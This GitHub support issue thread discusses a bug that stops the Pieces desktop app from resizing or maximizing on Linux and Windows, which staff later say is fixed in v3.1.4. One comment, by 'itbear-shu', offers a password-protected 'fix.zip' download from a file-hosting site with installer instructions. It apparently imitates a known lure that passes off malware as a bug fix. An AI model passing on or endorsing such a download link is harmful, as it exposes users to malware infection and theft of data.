### ISSUE TITLE
Can't Maximize or Resize Pieces Desktop App

### ISSUE THREAD

**Issue by rosie-at-pieces** [pieces-app/support#380]
### Software

Desktop Application

### Operating System / Platform

Linux

### Your Pieces OS Version

10.1.4

### Early Access Program

- [ ] Yes, this is related to an Early Access Program feature.

### Kindly describe the bug and include as much detail as possible on what you were doing so we can reproduce the bug.

Some users (Linux and Windows) are experiencing issues resizing and maximizing the Pieces Desktop App, particularly Linux users. Please report your experience here and we'll keep you updated as we find a solution!

Desktop app version 3.1.3

**Comment by mack-at-pieces** [comment]
The issue has been identified and this will be resolved in a patch release to the desktop application this week 👍🏼

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Oliver-Turp** [comment]
Was about to jump on and say I noticed this too. But I have a windows machine. Cannot full screen or resize in any redirection.

Is there any ETA on the release? I have exactly the right amount of monitors for my setup and I can't give the desktop app more than the usual 3/4 of a screen as now I cannot see my terminal.

**Comment by digions** [comment]
Same issue here...

Platform Linux Linux 6.10.6-200.fc40.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Aug 19 14:09:30 UTC 2024

**Comment by mack-at-pieces** [comment]
Hi @Oliver-Turp @digions & others - this issue should have been resolved with Pieces Desktop v3.1.4 which was released last week. Please update and let us know if you are still having any issues. Thanks!
